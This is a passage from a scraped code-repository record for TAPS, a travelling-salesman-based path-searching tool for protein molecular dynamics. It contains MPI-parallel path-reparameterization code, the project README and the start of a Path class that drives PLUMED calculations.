self.rsTol)\n\t\t\tprint(\"+++TAPS+++ Finding median(z) conformations\")\n\t\t\tt0 = time.time()\n\n\t\tcomm.Barrier()\n\t\t\t\n\t\ttotTRJ = len(dirSamples) # the total number of trajectories sampled\n\t\tN_jobs = totTRJ\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\ttrjDir = self.dirRoot + '/' + dirMeta + '/' + dirSamples[tid]\n\t\t\t\t#print(\"+++DEBUG+++ find med(z) in \", dirSamples[tid], tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter\", itr)\n\t\t\t\tmeta = md.load(trjDir + '/' + self.trjName, top=self.topFile) \n\t\t\t\t# colvar_filter is generated after sampling\n\t\t\t\tcvs = np.loadtxt(trjDir + '/colvar_filter', dtype=float)\n\t\t\t\tz = cvs[:, 2] # third column is pcv-z\n\t\t\t\trsPol = cvs[:, 4] # fifth column is the value of the restraining potential\n\t\t\t\tzwPol = cvs[:, 5] # sixth column is the value of the wall potential on pcv-z\n\t\t\t\twith np.errstate(invalid='ignore'):\n\t\t\t\t\tcuts = np.where((rsPol >= self.rsTol) | (zwPol >= self.rsTol))[0]\n\t\t\t\tif len(cuts) > 0:\n\t\t\t\t\tcut = cuts[0]\n\t\t\t\t\tif cut < meta.n_frames:\n\t\t\t\t\t z_filter = z[0:cut]\n\t\t\t\t\telse:\n\t\t\t\t\t z_filter = z[0:meta.n_frames]\n\t\t\t\telse:\n\t\t\t\t\tcut = meta.n_frames\n\t\t\t\t\tz_filter = z[0:meta.n_frames]\n\t\t\t\tranz = np.absolute(np.max(z_filter) - np.min(z_filter)) / 10.0\n\t\t\t\t# =============================================================================================\n\t\t\t\t# find median(z) conformations from filtered trajectories\n\t\t\t\t# NOTE: median(z) values given by 'numpy.median(z_filter)' is not an element of the array 'z_filter'\n\t\t\t\t# NOTE: This causes troubles when z is unevenly distributed in the array 'z_filter'\n\t\t\t\t# NOTE: Therefore, we use an straightforward implementation for median(z) as the following:\n\t\t\t\t# =============================================================================================\n\t\t\t\tmedz = np.sort(z_filter)[len(z_filter) // 2]\n\t\t\t\tind_medz = np.where(np.absolute(z_filter - medz) < ranz)[0]\n\n\t\t\t\t# =============================================================================================\n\t\t\t\t# extract median(z) confs\n\t\t\t\t# =============================================================================================\n\t\t\t\tconf_medz = meta.slice(ind_medz)\n\t\t\t\tgc = Confs.traj2conf(conf_medz).geoCentroid(self.pcvInd)\n\t\t\t\tgc.save(trjDir+'/gc_medz.xtc')\n\t\t\t\t# =============================================================================================\n\t\t\t\t# extract \"physical\" conformations from as input for path re-parameterization\n\t\t\t\t# =============================================================================================\n\t\t\t\tind_filter = np.array(range(cut))\n\t\t\t\tfiltTRJ = meta.slice(ind_filter)\n\t\t\t\tfiltTRJ.save(trjDir + '/' + self.trjFilter) \n\t\t\t\t#print(\"+++DEBUG+++ Filtered conformations stored in \", dirSamples[tid], tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter\", itr)\n\n\t\tcomm.Barrier()\n\n\t\tif rank == 0:\n\t\t\t# =====================================================================================================\n\t\t\t# store medz centroids per metaD trajectory\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Storing median(z) nodes of this iteration\")\n\t\t\tlist_medz = []\n\t\t\tfor i in range(totTRJ):\n\t\t\t\ttrjDir = self.dirRoot + '/' + dirMeta + '/' + dirSamples[i]\n\t\t\t\t#print(\"+++DEBUG+++ trjDir:\", trjDir) \n\t\t\t\tlist_medz.append(Confs.traj2conf(md.load(trjDir+'/gc_medz.xtc',top=self.topFile)))\n\t\t\t\t#print(\"+++DEBUG+++ Loaded: gc_med.xtc in \", trjDir)\n\t\t\tmz = Confs.merge(list_medz)\n\t\t\tpmz = Path('mz_tsp', self.pcvInd, mz, dirSamples)\n\t\t\tpmz.nodes.save(self.dirRoot + '/' + dirMeta + '/mz.xtc')\n\t\t\t# DEBUG pmz = Path('mz_tsp', self.pcvInd, Confs.traj2conf(md.load(self.dirRoot + '/' + dirMeta + '/mz.xtc', top=self.topFile)), dirSamples)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ Finding med(z) took \", t1 - t0, ' sec')\n \n\t\t\t# =====================================================================================================\n\t\t\t# Travelling-salesman reordering\n\t\t\t# ===================================================================================================== \n\t\t\tpmz.reOrder(dire=self.dirRoot + '/' + dirMeta)\n\t\t\tpmz.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 1. truncation\n\t\t\t# In practise, this is done by removing tails and add the original two terminal nodes in two ends\t\t\t\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Truncating path: remove segments beyond the two fixed ends\")\n\n\t\t\tt0 = time.time()\n\n\t\t\tp_trunc = pmz.truncate(self.initNode, self.finalNode)\n\t\t\tp_trunc.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ Truncation took \", t1 - t0, ' sec')\n\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 2. increase tolDist*=2 shortcut the path\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Straightening path:\")\n\t\t\tprint(\"+++TAPS+++ [a] Short-cutting path by \", self.tolDist, \" x \", self.stf)\n\n\t\t\tt0 = time.time()\n\n\t\t\tp_rc = p_trunc.rmClose(self.tolDist * self.stf)\n\t\t\tp_rc.pathName = \"mz_tsp_rc\"\n\t\t\tp_rc.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ time-cost:\", t1 - t0, ' sec')\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 3. insert conformation between distant neighbor nodes\n\t\t\t# =====================================================================================================\n\t\t\t# For inserting comformations between distant nodes\n\t\t\t# filtered samples of both the current and last round should be used as candidates\n\t\t\t# this is to ensure that there are always sufficient input conformations for path reparameterization\n\t\t\t# and avoids the path to be broken ( which allows a larger zwall and quicker convergence)\n\t\t\t# as long as the first rounds gives connected path, this strategy should work fine,\n\t\t\t# because although this round has broken path, once conformations are inserted from previous round\n\t\t\t# sampling of next round will definitely include connecting conformations\n\t\t\t# It is also possible to store all sampled data for path-reparameterization, but this is too memory-consuming\n\t\t\t# =====================================================================================================\n\n\t\t\tprint(\"+++TAPS+++ [b] Re-inserting MetaD conformation into straightened path\")\n\n\t\t\t# only use the trajectores in-between distant pairs for insertion, reducing costs \n\t\t\t(listFar, dirFar, segInd, farInSeg) = p_rc.distantNeighbors(tolDist=self.tolDist, doPBC=False)\n\t\t\t#print(\"+++DEBUG+++ dirFar=\", dirFar)\n\t\t\t#print(\"+++DEBUG+++ segInd=\", segInd)\n\t\t\t#print(\"+++DEBUG+++ farInSeg=\", farInSeg) \n\t\t\t# cut path into segments, for parallelization of insertion \n\t\t\tpSeg=[]\n\t\t\tfor i in range(len(segInd)):\n\t\t\t\t#print(\"+++DEBUG+++ \", i,segInd[i],j,farInSeg[j])\n\t\t\t\tpSeg.append(p_rc.pSlice(segInd[i]))\n\t\t\t\tif i not in farInSeg:\n\t\t\t\t\tsegTRJ = self.dirRoot + '/' + dirMeta + '/seg' + str(i) +'.xtc'\n\t\t\t\t\t#print(\"+++DEBUG+++ \",i,segTRJ) \n\t\t\t\t\tpSeg[i].nodes.save(segTRJ)\n\t\t\t\t\t#print(\"+++DEBUG+++ \",segTRJ)\n \n\t\t\t# decide which trajectories to use for insertion\n\t\t\t# extracting node (traj) index from dir, which are the last 3 letters\n\t\t\tdirHead = dirSamples[0][0:(len(dirSamples[0])-3)]\n \n\t\t\tdataFar = []\n\t\t\tfor i in range(len(dirFar)):\n\t\t\t\tstr1 = dirFar[i][0]\n\t\t\t\tstr2 = dirFar[i][1]\n\t\t\t\ti1 = int(str1[(len(str1)-3):len(str1)])\n\t\t\t\ti2 = int(str2[(len(str2)-3):len(str2)]) \n\t\t\t\tif i1 < i2:\n\t\t\t\t\ttmp = list(range(i1,(i2+1)))\n\t\t\t\telif i1 == i2:\n\t\t\t\t\ttmp = [i1] \n\t\t\t\telse:\n\t\t\t\t\ttmp = list(range(i2,(i1+1)))\n\t\t\t\tfor j in range(len(tmp)):\n\t\t\t\t\ttmp[j] = dirHead + digits(tmp[j])\n\t\t\t\tdataFar.append(tmp)\n\t\t\t#print(\"+++DEBUG+++ dataFar=\", dataFar)\n\t\telse:\n\t\t\tpSeg=None\n\t\t\tdataFar=None\n\t\t\tfarInSeg=None\n\t\n\t\tpSeg = comm.bcast(pSeg, root=main_rank)\n\t\tdataFar = comm.bcast(dataFar, root=main_rank)\n\t\tfarInSeg = comm.bcast(farInSeg, root=main_rank)\n\n\t\t# trajctory directories are stored in dataFar[][]\n\t\tN_jobs=len(farInSeg)\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\t#t0 = time.time()\n\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dataFar[tid][0] + '/' + self.trjFilter\n\t\t\t\tdata= md.load(trjDIR, top=self.topFile)\n\t\t\t\tfor j in range(1,len(dataFar[tid])):\n\t\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dataFar[tid][j] + '/' + self.trjFilter\n\t\t\t\t\t#print(\"+++DEBUG+++ \", trjDIR)\n\t\t\t\t\tdata = data.join(md.load(trjDIR, top=self.topFile)) \n\t\t\t\t#t1 = time.time()\n\t\t\t\tifar = farInSeg[tid]\n\t\t\t\t#print(\"+++DEBUG+++ Loading & Merging of \" + str(dataFar[tid]) + \" samples for Segment\" + str(ifar) + \" took \" + str(t1-t0) + ' sec')\n\t\t\t\tp = pSeg[ifar].insert(Confs.traj2conf(data), None, self.tolDist, self.devMID, self.tolCos)\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(ifar) + '.xtc'\n\t\t\t\tp.nodes.save(segXTC)\n\t\t\t\t#t2 = time.time()\n\t\t\t\t#print(\"+++DEBUG+++ Insertion for Segment\" + str(ifar) + \" with \" + str(dataFar[tid]) + \" samples took \" + str(t2-t1) + ' sec')\n\t\t#mpi4py barrier#\n\t\t\n\t\tif rank==0:\n\t\t\t# re-merge different segments\n\t\t\tnSeg = len(segInd)\n\t\t\tsegs = [] \n\t\t\tfor i in range(nSeg-1):\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(i) +'.xtc'\n\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\t\t#print(\"+++DEBUG+++ Loaded \", segXTC, \"for merging\")\n\t\t\t\t# remove repetitive nodes\n\t\t\t\tif segInd[i][len(segInd[i])-1] == segInd[i+1][0]:\n\t\t\t\t\ttrjSeg = trjSeg.slice(np.arange(trjSeg.n_frames-1))\n\t\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(nSeg-1) +'.xtc'\n\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\tmerged = Confs.merge(segs)\n\t\t\t#print(\"+++DEBUG+++ Segments merged\")\n\t\t\tp_in = Path('mz_tsp_rc_in', self.pcvInd, merged)\n\t\t\tp_in.exportPath(self.dirRoot + '/' + dirMeta) \n\t\t\t#print(\"+++DEBUG+++ Inserted path generated\")\t\t\t\n\t\t\t# clean up temporary segXXX.xtc files\n\t\t\tfor f in glob.glob(self.dirRoot + '/' + dirMeta + \"/seg*.xtc\"):\n\t\t\t\tos.remove(f)\n\t\t\tt2 = time.time()\n\t\t\tprint(\"+++TAPS+++ time-cost:\", t2 - t1, ' sec')\n\t\t\t#print(\"+++DEBUG+++ p_in.oriDIR=\",p_in.oriDIR)\n\t\t# ==============================================================================================================\n\t\t# path re-parameterization, step 4. if there are still distant neighbor nodes, extra targeted MD is performed\n\t\t# ==============================================================================================================\t\t\t\n\t\t\t(listFar, dirFar, segInd, farInSeg) = p_in.distantNeighbors(tolDist=self.tolDist, doPBC=False)\n\t\telse:\n\t\t\tlistFar = None\n\t\t\tsegInd = None\n\t\t\tfarInSeg = None\n \n\t\tlistFar = comm.bcast(listFar, root=main_rank)\n\t\tsegInd = comm.bcast(segInd, root=main_rank)\n\t\tfarInSeg = comm.bcast(farInSeg, root=main_rank)\n\n\t\tif len(listFar) > 0:\n\t\t\tif rank == 0:\n\t\t\t\tprint(\"+++TAPS+++ Distant nodes are still present\\n+++TAPS+++ Perform targeted MD for reparameterization.\")\n\t\t\t\tt0 = time.time()\n\t\t\t\tdirTMDs = self.tmd_dirs(listFar, dirMeta)\n\t\t\telse:\n\t\t\t\tdirTMDs = None\n\t\t\t\n\t\t\t#mpi4py barrier #\n\t\t\tdirTMDs = comm.bcast(dirTMDs, root=main_rank)\n\n\t\t\tif rank == 0:\n\t\t\t\tt1 = time.time()\n\t\t\t\tprint(\"+++TAPS+++ tMD preparation finshed (time-cost:\", t1-t0, \"sec)\")\n\n\t\t\t#mpi4py barrier#\n\t\t\tself.tmd_sample(dirMeta, dirTMDs)\n\t\t\t#mpi4py barrier#\n\n\t\t\t# put all segments and tmd trajectories together \n\t\t\tif rank == 0:\n\t\t\t\tt2 = time.time()\n\t\t\t\tprint(\"+++TAPS+++ tMD sampling finished (time-cost:\", t2-t1, \"sec)\")\n\t\t\t\t# cut path into segments\n\t\t\t\t#print(\"+++DEBUG+++ segInd=\", segInd)\n\t\t\t\tpSeg=[]\n\t\t\t\tfor i in range(len(segInd)):\t\t\t\t\t\n\t\t\t\t\tpSeg.append(p_in.pSlice(segInd[i]))\n\t\t\t\t\tif i not in farInSeg:\n\t\t\t\t\t segTRJ = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg' + str(i) +'.xtc'\n\t\t\t\t\t #print(\"+++DEBUG+++ \", segTRJ)\n\t\t\t\t\t pSeg[i].nodes.save(segTRJ) \n\t\t\telse:\n\t\t\t\tpSeg=None\n\t\t\tcomm.Barrier()\n\t\t\tpSeg = comm.bcast(pSeg, root=0)\n\t\t\tcomm.Barrier()\n\n\t\t\t# replace far segments by shortCuted tmd traj\n\t\t\tN_jobs=len(dirTMDs)\n\t\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t\ttid = itr * size + rank\n\t\t\t\tif tid < N_jobs:\n\t\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dirTMDs[tid] + '/' + self.trjName\n\t\t\t\t\tt0 = time.time()\n\t\t\t\t\tdata= md.load(trjDIR, top=self.topFile)\n\t\t\t\t\tifar = farInSeg[tid]\n\t\t\t\t\tp = pSeg[ifar].insert(Confs.traj2conf(data), None, self.tolDist, self.devMID, self.tolCos)\n\t\t\t\t\tt1 = time.time()\n\t\t\t\t\t#print(\"+++DEBUG+++ Insertion for Segment\" + str(ifar) + \" with \" + dirTMDs[tid] + \" samples took \" + str(t1-t0) + ' sec')\n\t\t\t\t\tsegTRJ = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg' + str(ifar) + '.xtc'\n\t\t\t\t\tp.nodes.save(segTRJ)\n\n\t\t\t#mpi4py barrier #\n\n\t\t\tif rank == 0:\n\t\t\t\tnSeg = len(segInd)\n\t\t\t\tsegs = [] \n\t\t\t\tfor i in range(nSeg-1):\n\t\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg'+ str(i) +'.xtc'\n\t\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\t\t\t#print(\"+++DEBUG+++ Loaded \", segXTC, \"(\", trjSeg.n_frames, \"frames)\")\n\t\t\t\t\t# remove repetitive nodes\n\t\t\t\t\tif segInd[i][len(segInd[i])-1] == segInd[i+1][0]:\n\t\t\t\t\t trjSeg = trjSeg.slice(np.arange(trjSeg.n_frames-1))\n\t\t\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg'+ str(nSeg-1) +'.xtc'\n\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\n\t\t\t\t# re-merge different segments\n\t\t\t\tp_tmd = Path(\"mz_tsp_tmd\", self.pcvInd, Confs.merge(segs))\n\t\t\t\tp_tmd.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\t\t# clean up temporary segXXX.xtc files\n\t\t\t\tfor f in glob.glob(self.dirRoot + '/' + dirMeta + \"/tmd4repar/seg*.xtc\"):\n\t\t\t\t os.remove(f)\n\n\t\t\telse:\n\t\t\t\tp_tmd = None \n\t\telse:\n\t\t\tif rank == main_rank:\n\t\t\t\tp_tmd = p_in\n\t\t\telse:\n\t\t\t\tp_tmd = None\n\n\t\t#mpi4py barrier#\n\t\t# ===================================================================================================\n\t\t# path re-parameterization, step 5. use tolDist to shortcut the path\n\t\t# ===================================================================================================\n\t\tif rank == 0:\n\t\t\tp_next = p_tmd.rmClose(self.tolDist)\n\t\t\tp_next.exportPath(self.dirRoot + '/' + dirMeta)\n\t\t\tprint('+++TAPS+++ Path-reparameterization finished')\n\t\telse:\n\t\t\tp_next = None\n\n\t\t#mpi4py barrier#\n\n\t\treturn p_next\n"
},
{
"alpha_fraction": 0.6425505876541138,
"alphanum_fraction": 0.6781116127967834,
"avg_line_length": 25.73770523071289,
"blob_id": "d3caeb0a6aa0a2b07e156b7cc5f7fcdef9f56447",
"content_id": "0a3b480dc47c95a23e66e84cb30024899801c13e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1631,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 61,
"path": "/README.md",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "TAPS released in 2020 (Travelling-salesman based Automatic Path-Searching)\n===\nRequirements\n==\n * GROMACS >=2019.4\n * Plumed >=2.7\n * Cuda >=10.2\n * Openmpi >=4.0.2\n * python >=3.7.4 \n * numpy >=1.17.2\n * MDTraj >=1.9.3\n * GromacsWrapper >=0.8.0\n * mpi4py >=3.0.3\n * [concorde](http://www.math.uwaterloo.ca/tsp/concorde.html) :\n * These requirements were tested and proved to work. Feel free to test\n\nInstall Python and Python Packages\n==\nWe highly recommend that you download the Python 3.x version of Anaconda, which is a completely free enterprise-ready Python distribution for large-scale data processing, predictive analytics, and scientific computing.\n\nDesign and Usage\n==\nTravelling-salesman based Automatic Path-Searching (TAPS)\n===\n * No static coordinate space (CVs): ordered high dimensional conformations\n * Perpendicular relaxation: Quickly find MFEP segments\n * Automatic re-order of path nodes by Travelling-salesman\n * Enhanced sampling along path on PCV-s by MetaD\n * Validated for three protein systems (76-303 residues and total 30000-80000 atoms, [TAPStest](https://pubs.acs.org/journal/jctcce)) \n \nTutorial\n==\n 1. The parameters used for TAPS can be modified in pars/taps.par file\n 2. Serial Running:\n```\n 1. Change runMode to \"serial\" in taps.par\n 2. > python runTAPS.py \n```\n 3. Parallel Running:\n```\n 1. Change runMode to \"Parallel\" in taps.par\n 2. > mpirun -np 8 python runTAPS.py \n```\n\nTODO\n=\n\n[ ] Update Tutorial\n\n[ ] Test more\n \nAuthors:\n=\n\nLizhe Zhu: *[email protected]*\n\nKun Xi: *[email protected]*\n\nContributors:\n=\n Maybe you !\n"
},
{
"alpha_fraction": 0.522478461265564,
"alphanum_fraction": 0.5352123379707336,
"avg_line_length": 43.25773239135742,
"blob_id": "c0ed8e441eff9a47c7b47cab856ada554f4b9422",
"content_id": "099ae83d360bdf7c27fe3c187c232c81549a0e0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25758,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 582,
"path": "/Path.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "#=======================================================================================================================\n# global imports\n#=======================================================================================================================\nfrom __future__ import print_function, division\nimport numpy as np\nimport mdtraj as md\nimport os\nimport re\nfrom Confs import Confs\nfrom copy import deepcopy\nimport glob\n#import time\n\n#=======================================================================================================================\n# global names for plumed command: 'plumed' and 'driver'\n#=======================================================================================================================\n#plu=\"srun --ntasks=1 --hint=nomultithread --ntasks-per-node=1 --ntasks-per-socket=1 --ntasks-per-core=1 --mem_bind=v,local plumed\"\n# TODO: put binary name of 'plumed' as input\nplu = \"plumedx\"\n#plu = \"plumedy\"\ndri = \"drivers\" # TODO: put binary name of 'driver' as input\n\nclass Path(object):\n\t# ==================================================================================================================\n\t# constructor: one input at least - the name of the path\n\t# ==================================================================================================================\n\tdef __init__(self, pName=\"path_node\", pInd = None, nodes = None, ori = []):\n\t\tself.pathName = pName\n\t\tself.pcvInd = deepcopy(pInd)\n\t\tself.nodes = deepcopy(nodes)\n\t\tself.oriDIR = ori # list of string to store the directory where node is from (None if not from sampling)\n\t\tif (pInd is not None) and (nodes is not None):\n\t\t\tself.n_nodes=self.nodes.n_frames\n\t\t\tif len(ori)==main_rank:\n\t\t\t\tself.oriDIR = [None]*self.n_nodes\n\t\telse:\n\t\t\tself.n_nodes = None\n\t\t\tself.lamda = None\n\t\t\tself.pcvs = None\n\n\tdef pcv(self, dire = None, trj = None):\n\t\t# temporary file names\n\t\ttmpCVfile = dire + '/tmpCOLVAR'\n\t\tpluPdbFile = dire + \"/tmpFrames.pdb\"\n\t\tself.nodes.save_plu2(pluPdbFile,self.pcvInd)\n\t\t# if no trajectory is given, compute lamda and sw, etc for self\n\t\tif trj is None:\n\t\t\t# compute lamda\n\t\t\tpluAtoms = self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\t\t# temporary array to store all neighbor RMSD\n\t\t\tnb = np.zeros(((self.n_nodes-1), 1))\n\t\t\tfor frame in range(0, (self.n_nodes-1)):\n\t\t\t\t# align frames using alignIndex\n\t\t\t\tpluAtoms.superpose(pluAtoms,frame, self.pcvInd.align) # here align and rmsd are both for sliced trajectory\n\t\t\t\t# compute RMSD\n\t\t\t\trms = md.rmsd(pluAtoms, pluAtoms, frame, self.pcvInd.rms)\n\t\t\t\tnb[frame]=rms[(frame+1)]\n\t\t\tavNB2=np.divide(np.sum(np.square(nb)),frame)\n\t\t\tself.lamda=3.2/avNB2\n\n\t\t\t# prepare plumed input file for distance calculation\n\t\t\tpluInput = dire + \"/\" + self.pathName + \".plu\"\n\t\t\tf = open(pluInput, 'w+')\n\t\t\tatoms = ''\n\t\t\tfor i in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[i] + 1) + ','\n\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\t#print(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\tprint('p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8' % \\\n\t\t\t\t(pluPdbFile, self.lamda), file=f)\n\t\t\tprint('PRINT ARG=p1.sss,p1.zzz STRIDE=1 FILE=%s FMT=%s' % (tmpCVfile, '%8.8f'), file=f)\n\t\t\tf.close()\n\n\t\t\t# write nodes to disk\n\t\t\ttrjFile = dire + \"/tmp.xtc\"\n\t\t\tself.nodes.save(trjFile)\n\n\t\t\t# launch plumed for pcv calculation\n\t\t\ttmpOutFile = dire + \"/pluOut.tmp\"\n\t\t\tcmd = plu + \" \" + dri + \" --mf_xtc \" + trjFile + \" --plumed \" + pluInput + \" 1>\" + tmpOutFile + \" 2>\" + tmpOutFile\n\t\t\tos.system(cmd)\n\t\t\t#print('+++DEBUG+++ ', cmd)\n\n\t\t\tfr = open(tmpCVfile, 'r+')\n\t\t\tlines = fr.read()\n\t\t\tfr.close()\n\n\t\t\tfw = open(tmpCVfile, 'w')\n\t\t\t# remove any line that includes '#'\n\t\t\tpdata = re.sub(\"#.*\\n\", \"\", lines)\n\t\t\tprint(pdata, file=fw)\n\t\t\tfw.close()\n\t\t\t# store in self.pcvs\n\t\t\tcvs = np.loadtxt(tmpCVfile, dtype=float)\n\t\t\tself.pcvs = cvs[:, 1]\n\t\t\tself.pcvz = cvs[:, 2]\n\t\t\tos.remove(tmpCVfile)\n\t\t\tos.remove(tmpOutFile)\n\t\t\tos.remove(pluInput)\n\t\t\tos.remove(trjFile)\n\t\t\tos.remove(pluPdbFile)\n\n\t\t# if a trajectory is given, compute the PCV-s and PCV-z of this trajectory\n\t\telse:\n\t\t\tif isinstance(trj,md.Trajectory):\n\t\t\t\t# write md.trajectory to disk\n\t\t\t\ttrjFile = \"tmp.xtc\"\n\t\t\t\ttrj.save(trjFile)\n\n\t\t\t\t# prepare plumed input file for distance calculation\n\t\t\t\tpluInput = self.pathName + \".plu\"\n\t\t\t\tf = open(pluInput, 'w+')\n\t\t\t\tatoms = ''\n\t\t\t\tfor i in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[i] + 1) + ','\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\t\t#print(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\t\tprint('p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8' % \\\n\t\t\t\t\t(pluPdbFile, self.lamda), file=f)\n\t\t\t\tprint('PRINT ARG=p1.sss,p1.zzz STRIDE=1 FILE=%s FMT=%s' % (tmpCVfile, '%8.8f'), file=f)\n\t\t\t\tf.close()\n\n\t\t\t\t# launch plumed for pcv calculation\n\t\t\t\ttmpOutFile = 'pluOut.tmp'\n\t\t\t\tcmd = plu + \" \" + dri + \" --mf_xtc \" + trjFile + \" --plumed \" + pluInput \\\n\t\t\t\t\t+ \" 1>\" + tmpOutFile + \" 2>\" + tmpOutFile\n\t\t\t\tos.system(cmd)\n\n\t\t\t\t#read plumed output\n\t\t\t\tfr = open(tmpCVfile, 'r+')\n\t\t\t\tlines = fr.read()\n\t\t\t\tfr.close()\n\t\t\t\t\n\t\t\t\tfw = open(tmpCVfile, 'w')\n\t\t\t\t# remove any line that includes '#'\n\t\t\t\tpdata = re.sub('#.*\\n', '', lines)\n\t\t\t\tprint(pdata, file=fw)\n\t\t\t\tfw.close()\n\t\t\t\t# store in self.pcvs\n\t\t\t\tcvs = np.loadtxt(tmpCVfile, dtype=float)\n\t\t\t\tif trj.n_frames == 1:\n\t\t\t\t\ts = cvs[1]\n\t\t\t\t\tz = cvs[2]\n\t\t\t\telse:\n\t\t\t\t\ts = cvs[:, 1]\n\t\t\t\t\tz = cvs[:, 2]\n\t\t\t\tos.remove(tmpCVfile)\n\t\t\t\tos.remove(tmpOutFile)\n\t\t\t\tos.remove(pluInput)\n\t\t\t\tos.remove(trjFile)\n\t\t\t\tos.remove(pluPdbFile)\n\t\t\t\treturn s, z\n\t\t\telse:\n\t\t\t\traise ValueError(\"nodes must be an instance of mdtraj.Trajectory or TAPS.Confs\")\n\n\t# ==================================================================================================================\n\t# load path from a trajectory, computes PCV of this path automatically after loading\n\t# ==================================================================================================================\n\tdef loadFromTRJ(self, trajName, topName):\n\t\tself.nodes = Confs.traj2conf(md.load(trajName, top=topName))\n\t\tself.n_nodes = self.nodes.n_frames\t\t\n\n\t# ==================================================================================================================\n\t# export each node as pdb for MD/MetaD, must include all atoms of the system\n\t# ==================================================================================================================\n\tdef exportFrames(self):\n\t\tfor i in range(self.n_nodes):\n\t\t\tnd=self.nodes.slice(i)\n\t\t\tnd.save(self.pathName+'_node'+str(i)+'.pdb')\n\n\t# ==================================================================================================================\n\t# export all nodes into a trajectory file under a specified directory\n\t# ==================================================================================================================\n\tdef exportPath(self, dire):\n\t\tself.nodes.save(dire + '/' + self.pathName+'.xtc')\n\n\t# ==================================================================================================================\n\t# export all nodes as a Plumed pdb file for PCV computation\n\t# ==================================================================================================================\n\tdef exportPCV(self, dire):\n\t\tpluPdbFile = self.pathName + \"_plu.pdb\"\n\t\tif type(self.nodes) is Confs:\n\t\t\tself.nodes.save_plu2(dire+'/'+pluPdbFile,self.pcvInd)\n\t\telse:\n\t\t\traise ValueError(\"nodes must be an instance of the class Confs\")\n\n\t# ==================================================================================================================\n\t# use concorde to generate new order of the n_nodes#######Pay attention! Concorde!\n\t# ==================================================================================================================\n\tdef reOrder(self, doPBC=False, dire=None):\n\t\t# generate RMSD matrix for concorde\n\t\tdist = np.zeros((self.n_nodes+1, self.n_nodes+1))\n\t\tif doPBC:\n\t\t\tself.nodes.image_molecules()\n\t\tpluAtoms = self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\tpluAtoms.superpose(pluAtoms, 0, self.pcvInd.align)\n\t\tfor i in range(self.n_nodes):\n\t\t\tdist[i][0:self.n_nodes] = md.rmsd(pluAtoms, pluAtoms, i, self.pcvInd.rms)\n\t\tnp.savetxt('rmsd.conc', dist*1000, fmt='%d')\n\t\tfc = open('head.conc', 'w')\n\t\tprint(\"NAME: RMSD\",file=fc)\n\t\tprint(\"TYPE: TSP\", file=fc)\n\t\tprint(\"DIMENSION: %d\" % (self.n_nodes+1), file=fc)\n\t\tprint(\"EDGE_WEIGHT_TYPE: EXPLICIT\", file=fc)\n\t\tprint(\"EDGE_WEIGHT_FORMAT: FULL_MATRIX\", file=fc)\n\t\tprint(\"EDGE_WEIGHT_SECTION:\", 